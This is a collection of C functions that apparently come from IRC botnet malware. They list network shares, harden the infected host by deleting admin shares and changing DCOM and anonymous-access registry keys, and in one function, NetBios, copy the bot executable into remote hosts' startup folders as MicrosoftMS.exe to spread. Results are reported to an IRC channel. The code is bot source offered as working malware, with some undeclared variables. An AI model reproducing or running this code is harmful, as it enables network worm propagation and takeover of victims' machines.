BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName) { char buffer[IRCLINE]; PSHARE_INFO_502 pBuf,p; NET_API_STATUS nStatus; LPWSTR wServerName = (LPWSTR)AsWideString(ServerName); DWORD entriesread=0,totalread=0,resume=0; irc_privmsg(sock,chan,"Share name: Resource: Uses: Desc:",notice); do { nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume); if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) { p = pBuf; for(unsigned int i=1;i <= entriesread;i++) { sprintf(buffer,"%-14S %-24S %-6u %-4s",p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor))); irc_privmsg(sock,chan,buffer,notice,TRUE); p++; } fNetApiBufferFree(pBuf); } else { sprintf(buffer,"-\x03\x34\2net\2\x03- share list error %s <%ld>",NasError(nStatus),nStatus); irc_privmsg(sock,chan,buffer,notice); } } while (nStatus == ERROR_MORE_DATA); if(nStatus != ERROR_SUCCESS) return FALSE; return TRUE; }
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent) { char sendbuf[IRCLINE]; if (!noadvapi32) { HKEY hKey; if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) { TCHAR szDataBuf[]="N"; if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS) sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>"); else sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>"); fRegCloseKey(hKey); } else sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>"); if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE); addlog(sendbuf); if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) { DWORD dwData = 0x00000001; if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS) sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>"); else sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>"); fRegCloseKey(hKey); } else sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>"); } else sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>"); if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE); addlog(sendbuf); if (!nonetapi32) { PSHARE_INFO_502 pBuf,p; NET_API_STATUS nStatus; DWORD entriesread=0,totalread=0,resume=0; do { nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume); if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) { p = pBuf; for(unsigned int i=1;i <= entriesread;i++) { if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') { if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success) _snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »» Share '%S' deleted.",p->shi502_netname); else _snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »» Failed to delete '%S' share.",p->shi502_netname); if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE); addlog(sendbuf); } p++; } fNetApiBufferFree(pBuf); } else { for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) { if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success) _snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName); else _snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName); if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE); addlog(sendbuf); } } } while (nStatus == ERROR_MORE_DATA); sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>"); } else sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>"); if (!silent) irc_privmsg(sock,chan, sendbuf, notice); addlog(sendbuf); return TRUE; }
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent) { char sendbuf[IRCLINE]; if (!noadvapi32) { HKEY hKey; if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) { TCHAR szDataBuf[]="N"; if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS) sprintf(sendbuf,"[SECURE]: Disable DCOM failed."); else sprintf(sendbuf,"[SECURE]: DCOM disabled."); fRegCloseKey(hKey); } else sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key."); if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE); addlog(sendbuf); if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) { DWORD dwData = 0x00000001; if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS) sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share."); else sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share."); fRegCloseKey(hKey); } else sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key."); if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE); addlog(sendbuf); if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) { DWORD dwData = 0x00000001; if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS) sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts."); else sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts."); fRegCloseKey(hKey); } else sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key."); if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE); addlog(sendbuf); #ifndef NO_LSARESTRICT DWORD dwRet; if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0) sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet); else sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy."); #endif } else sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded."); if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE); addlog(sendbuf); #ifndef NO_NET if (!nonetapi32) { PSHARE_INFO_502 pBuf,p; NET_API_STATUS nStatus; DWORD entriesread=0,totalread=0,resume=0; do { nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume); if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) { p = pBuf; for(unsigned int i=1;i <= entriesread;i++) { if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') { char* szShareName = new char[wcslen(p->shi502_netname)+1]; WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL); if(ShareDel(NULL,szShareName) == NERR_Success) _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname); else _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname); if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE); addlog(sendbuf); delete szShareName; } p++; } fNetApiBufferFree(pBuf); } else { for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) { if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success) _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName); else _snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName); if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE); addlog(sendbuf); } } } while (nStatus == ERROR_MORE_DATA); sprintf(sendbuf,"[SECURE]: Network shares deleted."); } else sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded."); if (!silent) irc_privmsg(sock,chan, sendbuf, notice); addlog(sendbuf); #endif return TRUE; }
BOOL NetBios(char * Addr) { char szRemoteAddr[MAX_PATH]; sprintf(szRemoteAddr,"\\\\%s",Addr); HINSTANCE netapi32_dll = LoadLibrary("netapi32.dll"); if (netapi32_dll) { fNetShareEnum = (RSP5) GetProcAddress(netapi32_dll, "NetShareEnum"); //fNetApiBufferFree = (NABF) GetProcAddress(netapi32_dll, "NetApiBufferFree"); if (!fNetShareEnum || !fNetApiBufferFree) { //not xp/2000 ? return 2; } } else return 2; //dll's not found wchar_t wcRemoteAddr[MAX_PATH] = L""; mbstowcs(wcRemoteAddr, szRemoteAddr, strlen(szRemoteAddr) + 1); PSHARE_INFO_1 BufPtr,p; NET_API_STATUS res; DWORD er=0,tr=0,resume=0, i; char thisfilename[MAX_PATH]; char remotefilename[MAX_PATH]; char remoteinifilename[MAX_PATH]; char sendbuf[512]; GetModuleFileName(NULL,thisfilename,sizeof(thisfilename)); do { res = fNetShareEnum ((CHAR *) wcRemoteAddr, 1, (LPBYTE *) &BufPtr, -1, &er, &tr, &resume); if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA) { p=BufPtr; for(i=1;i<=er;i++) { if (p->shi1_type == STYPE_DISKTREE) { int s; for (s=0;startupdirs[s] != NULL;s++) { memset(remotefilename,0,sizeof(remotefilename)); sprintf(remotefilename,"%s\\%s\\%s\\MicrosoftMS.exe",szRemoteAddr,p->shi1_netname,startupdirs[s]); if (CopyFile(thisfilename,remotefilename,TRUE) != 0) { _snprintf(buffer,sizeof(buffer),"[NetBios]: Exploiting IP: %s",remotefile); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); fNetApiBufferFree(BufPtr); FreeLibrary(netapi32_dll); return 1; } } } p++; } fNetApiBufferFree(BufPtr); } else { FreeLibrary(netapi32_dll); return 1; } } while (res==ERROR_MORE_DATA); FreeLibrary(netapi32_dll); return 1; }
void SecureShares(BOOL secure, void *conn, char *target, BOOL silent, BOOL verbose, BOOL loop) { IRC* irc=(IRC*)conn; char sendbuf[IRCLINE]; char tmpBuffer[IRCLINE]; int shdel=0; int shmake=0; if (secure) { PSHARE_INFO_502 pBuf,p; NET_API_STATUS nStatus; DWORD entriesread=0,totalread=0,resume=0; if (!loop && !silent) sprintf(sendbuf,"%s Shares %s:",sec_title,"erased"); do { nStatus=fNetShareEnum(NULL,502,(LPBYTE *)&pBuf,-1,&entriesread,&totalread,&resume); if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) { p = pBuf; for(unsigned int i=1;i <= entriesread;i++) { if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') { if(fNetShareDel(NULL,(unsigned short *)p->shi502_netname,0) == NERR_Success) { if (!loop && !silent && verbose) { if (shdel>0) strcat(sendbuf,","); sprintf(tmpBuffer," %S",p->shi502_netname); strcat(sendbuf,tmpBuffer); } shdel++; } } p++; } fNetApiBufferFree(pBuf); } else { for(int i=0;i < (sizeof(ShareList)/sizeof(*ShareList));i++) { if(fNetShareDel(NULL,(unsigned short *)ShareList[i].ShareName,0) == NERR_Success) { if (!loop && !silent && verbose) { if (shdel>0) strcat(sendbuf,","); sprintf(tmpBuffer," %S",ShareList[i].ShareName); strcat(sendbuf,tmpBuffer); } shdel++; } } } } while (nStatus == ERROR_MORE_DATA); if (verbose && !loop && !silent) { if (shdel==0) irc->privmsg(target,"%s No shares %s.",sec_title,"erased"); else { sprintf(tmpBuffer," - Total shares %s: %d.","erased",shdel); strcat(sendbuf,tmpBuffer); irc->privmsg(target,sendbuf); } } else if (!loop && !silent && !verbose) { if (shdel==0) irc->privmsg(target,"%s No shares %s.",sec_title,"erased"); else { irc->privmsg(target,"%s Total shares %s: %d.",sec_title,"erased",shdel); } } } else { // Unsecure if (!loop && !silent) sprintf(sendbuf,"%s Shares %s:",unsec_title,"created"); NET_API_STATUS res; SHARE_INFO_2 p; DWORD parm_err = 0; for (int i=0;i < (sizeof(ShareList) / sizeof (*ShareList));i++) { p.shi2_netname = (unsigned short *)TEXT(ShareList[i].ShareName); p.shi2_type = STYPE_DISKTREE; p.shi2_remark = (unsigned short *)TEXT("rofl"); p.shi2_permissions = 0; p.shi2_max_uses = 4; p.shi2_current_uses = 0; p.shi2_path = (unsigned short *)TEXT(ShareList[i].SharePath); p.shi2_passwd = NULL; res=fNetShareAdd(NULL,2,(LPBYTE)&p,&parm_err); if(res==0) { if (!loop && !silent && verbose) { if (shmake>0) strcat(sendbuf,","); sprintf(tmpBuffer," %S",ShareList[i].ShareName); strcat(sendbuf,tmpBuffer); } shmake++; } } if (verbose && !loop && !silent) { if (shmake==0) irc->privmsg(target,"%s No shares %s.",unsec_title,"created"); else { sprintf(tmpBuffer," - Total shares %s: %d.","created",shmake); strcat(sendbuf,tmpBuffer); irc->privmsg(target,sendbuf); } } else if (!verbose && !silent && !loop) { if (shmake==0) irc->privmsg(target,"%s No shares %s.",unsec_title,"created"); else { irc->privmsg(target,"%s Total shares %s: %d.",unsec_title,"created",shmake); } // addlog(MAINLOG,sendbuf); } } return; }